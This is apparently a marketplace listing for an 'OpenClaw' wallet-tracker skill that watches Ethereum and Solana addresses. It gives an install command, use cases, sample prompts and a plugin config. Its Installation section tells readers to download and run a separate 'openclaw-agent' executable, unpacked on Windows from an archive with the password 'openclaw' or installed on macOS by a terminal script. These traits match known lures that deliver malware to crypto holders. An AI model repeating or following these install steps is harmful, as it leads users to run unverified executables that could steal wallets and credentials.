wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Track Ethereum and Solana wallets with OpenClaw. Monitor whale movements, real-time transactions, and portfolio changes effortlessly. Install the wallet-tracker skill today.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-auqlhWhat This Skill Does
The wallet-tracker skill is a robust blockchain monitoring solution designed for the OpenClaw AI agent. It allows users to track Ethereum, Solana, and other blockchain addresses in real-time. By leveraging the openclaw-agent utility, this skill provides deep insights into whale movements, token transfers, portfolio changes, and NFT activity. Whether you are performing forensic analysis on a hot wallet or monitoring decentralized finance (DeFi) interactions for automated responses, this tool provides the necessary hooks to process blockchain data efficiently.
Installation
To get started, first ensure your system meets the environmental requirements. You must download and run the openclaw-agent utility from the official GitHub releases. Windows users should extract the executable using the password 'openclaw', while macOS users can utilize the provided terminal installation script. Once the agent is active, install the skill by running the command: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-auqlh in your terminal. Ensure your OpenClaw agent is running in the background to permit API data flow.
Use Cases
This skill is indispensable for DeFi traders, crypto researchers, and developers. Use it to monitor whale wallets to identify large-scale market shifts. Developers can integrate it into automated trading bots to trigger actions upon detecting specific ERC-20 token transfers. It is also highly effective for tracking NFT collections to monitor rarity movement or creator wallet activity. For security, you can set up alerts to notify you of unauthorized portfolio changes or unexpected outgoing transfers from your monitored watchlists.
Example Prompts
- "OpenClaw, start tracking this Ethereum address 0x71C... and alert me whenever a transaction exceeds 50 ETH."
- "Show me the last 10 token transfers for this Solana address and notify me of any changes in the SOL balance."
- "Monitor this whale address and generate a summary report of their portfolio changes every hour."
Tips & Limitations
The wallet-tracker relies heavily on the quality of your Etherscan or Solana RPC API keys. To avoid rate limiting, ensure you have a premium API subscription if you intend to track multiple addresses at high frequencies. Note that this skill requires the local openclaw-agent to be running to establish the necessary network connections. It is recommended to implement your own filtering logic if you are tracking addresses with extremely high transaction volumes, as the raw logs can be noisy.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-auqlh": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.